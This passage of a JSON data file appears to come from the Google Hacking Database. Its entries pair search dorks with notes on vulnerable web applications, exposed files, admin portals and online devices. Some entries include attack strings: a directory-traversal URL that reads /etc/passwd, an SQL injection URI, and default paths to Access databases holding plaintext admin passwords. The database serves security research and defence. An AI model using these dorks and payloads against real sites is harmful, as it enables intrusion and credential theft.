        "shortDescription": "filetype:myd myd -CVS", 
        "textualDescription": "MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database."
    }, 
    {
        "signatureReferenceNumber": "687", 
        "link": "https://www.exploit-db.com/ghdb/687/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.de/search?q=%22Obtenez+votre+forum+Aztek%22+-site%3Aforum-aztek.com&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", 
        "shortDescription": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", 
        "textualDescription": "Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654"
    }, 
    {
        "signatureReferenceNumber": "688", 
        "link": "https://www.exploit-db.com/ghdb/688/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&q=intext%3A%28%22UBB.threads%E2%84%A2+6.2%22%7C%22UBB.threads%E2%84%A2+6.3%22%29+intext%3A%22You+*+not+logged+*%22+-site%3Aubbcentral.com", 
        "shortDescription": "intext:(\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.2\"|\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", 
        "textualDescription": "UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php"
    }, 
    {
        "signatureReferenceNumber": "689", 
        "link": "https://www.exploit-db.com/ghdb/689/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2FSiteChassisManager%2F+&btnG=Search", 
        "shortDescription": "inurl:/SiteChassisManager/", 
        "textualDescription": "Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/"
    }, 
    {
        "signatureReferenceNumber": "690", 
        "link": "https://www.exploit-db.com/ghdb/690/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Land+Down+Under+601%22", 
        "shortDescription": "\"Powered by Land Down Under 601\"", 
        "textualDescription": "sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google."
    }, 
    {
        "signatureReferenceNumber": "691", 
        "link": "https://www.exploit-db.com/ghdb/691/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22EvoCam%22+inurl:%22webcam.html%22&hl=en&lr=&c2coff=1&start=0&sa=Nurl", 
        "shortDescription": "intitle:\"EvoCam\" inurl:\"webcam.html\"", 
        "textualDescription": "Evocams !"
    }, 
    {
        "signatureReferenceNumber": "692", 
        "link": "https://www.exploit-db.com/ghdb/692/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl%3Adirectorypro.cgi", 
        "shortDescription": "inurl:directorypro.cgi", 
        "textualDescription": "A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793"
    }, 
    {
        "signatureReferenceNumber": "693", 
        "link": "https://www.exploit-db.com/ghdb/693/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22PhpMyExplorer%22+inurl%3A%22index.php%22+-cvs", 
        "shortDescription": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", 
        "textualDescription": "PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory."
    }, 
    {
        "signatureReferenceNumber": "694", 
        "link": "https://www.exploit-db.com/ghdb/694/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Acal_make.pl&btnG=Search", 
        "shortDescription": "inurl:cal_make.pl", 
        "textualDescription": "A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663"
    }, 
    {
        "signatureReferenceNumber": "695", 
        "link": "https://www.exploit-db.com/ghdb/695/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2Fwebedit.*+intext%3AWebEdit+Professional+-html", 
        "shortDescription": "inurl:/webedit.* intext:WebEdit Professional -html", 
        "textualDescription": "WebEdit is a content management system. This is the login portal search."
    }, 
    {
        "signatureReferenceNumber": "696", 
        "link": "https://www.exploit-db.com/ghdb/696/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=intitle:%22Apache::Status%22+(inurl:server-status+%7C+inurl:status.html+%7C+inurl:apache.html)&num=100", 
        "shortDescription": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", 
        "textualDescription": "The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm"
    }, 
    {
        "signatureReferenceNumber": "697", 
        "link": "https://www.exploit-db.com/ghdb/697/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+PowerPortal+v1.3%22", 
        "shortDescription": "\"Powered by PowerPortal v1.3\"", 
        "textualDescription": "PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681"
    }, 
    {
        "signatureReferenceNumber": "698", 
        "link": "https://www.exploit-db.com/ghdb/698/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=%22Microsoft+%28R%29+Windows+*+%28TM%29+Version+*+DrWtsn32+Copyright+%28C%29%22+ext%3Alog", 
        "shortDescription": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", 
        "textualDescription": "This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well."
    }, 
    {
        "signatureReferenceNumber": "699", 
        "link": "https://www.exploit-db.com/ghdb/699/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.co.uk/search?q=inurl%3Areport+%22EVEREST+Home+Edition+%22&hl=en&safe=off", 
        "shortDescription": "inurl:report \"EVEREST Home Edition \"", 
        "textualDescription": "Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find."
    }, 
    {
        "signatureReferenceNumber": "700", 
        "link": "https://www.exploit-db.com/ghdb/700/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=%22powered+by+minibb%22+%2Dsite%3Awww%2Eminibb%2Enet+%2Dintext%3A1%2E7f", 
        "shortDescription": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", 
        "textualDescription": "miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688"
    }, 
    {
        "signatureReferenceNumber": "701", 
        "link": "https://www.exploit-db.com/ghdb/701/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&q=%22powered+by+ducalendar%22+-site%3Aduware.com", 
        "shortDescription": "\"powered by ducalendar\" -site:duware.com", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb"
    }, 
    {
        "signatureReferenceNumber": "702", 
        "link": "https://www.exploit-db.com/ghdb/702/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&q=%22Powered+by+Duclassified%22+-site%3Aduware.com", 
        "shortDescription": "\"Powered by Duclassified\" -site:duware.com", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb"
    }, 
    {
        "signatureReferenceNumber": "703", 
        "link": "https://www.exploit-db.com/ghdb/703/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&&q=%22Powered+by+Dudirectory%22+-site%3Aduware.com", 
        "shortDescription": "\"Powered by Dudirectory\" -site:duware.com", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb"
    }, 
    {
        "signatureReferenceNumber": "704", 
        "link": "https://www.exploit-db.com/ghdb/704/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Duclassified%22+-site%3Aduware.com+%22DUware+All+Rights+Reserved%22&btnG=Search", 
        "shortDescription": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb"
    }, 
    {
        "signatureReferenceNumber": "705", 
        "link": "https://www.exploit-db.com/ghdb/705/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+duclassmate%22+-site%3Aduware.com", 
        "shortDescription": "\"powered by duclassmate\" -site:duware.com", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb"
    }, 
    {
        "signatureReferenceNumber": "706", 
        "link": "https://www.exploit-db.com/ghdb/706/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&q=intitle%3Adupics+inurl%3A%28add.asp+%7C+default.asp+%7C+view.asp+%7C+voting.asp%29+-site%3Aduware.com", 
        "shortDescription": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb"
    }, 
    {
        "signatureReferenceNumber": "707", 
        "link": "https://www.exploit-db.com/ghdb/707/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&q=%22powered+by+dudownload%22+-site%3Aduware.com", 
        "shortDescription": "\"powered by dudownload\" -site:duware.com", 
        "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb"
    }, 
    {
        "signatureReferenceNumber": "708", 
        "link": "https://www.exploit-db.com/ghdb/708/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22ipcop+-+main%22&filter=0", 
        "shortDescription": "intitle:\"ipcop - main\"", 
        "textualDescription": "IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)"
    }, 
    {
        "signatureReferenceNumber": "709", 
        "link": "https://www.exploit-db.com/ghdb/709/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22Smoothwall+Express%22+inurl%3Acgi-bin+%22up+*+days%22", 
        "shortDescription": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", 
        "textualDescription": "smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment)."
    }, 
    {
        "signatureReferenceNumber": "710", 
        "link": "https://www.exploit-db.com/ghdb/710/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aphp+HAXPLORER+%22Server+Files+Browser%22&btnG=Search", 
        "shortDescription": "filetype:php HAXPLORER \"Server Files Browser\"", 
        "textualDescription": "Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers"
    }, 
    {
        "signatureReferenceNumber": "711", 
        "link": "https://www.exploit-db.com/ghdb/711/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Acoranto.cgi+intitle%3ALogin+%28Authorized+Users+Only%29", 
        "shortDescription": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", 
        "textualDescription": "Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial!"
    }, 
    {
        "signatureReferenceNumber": "712",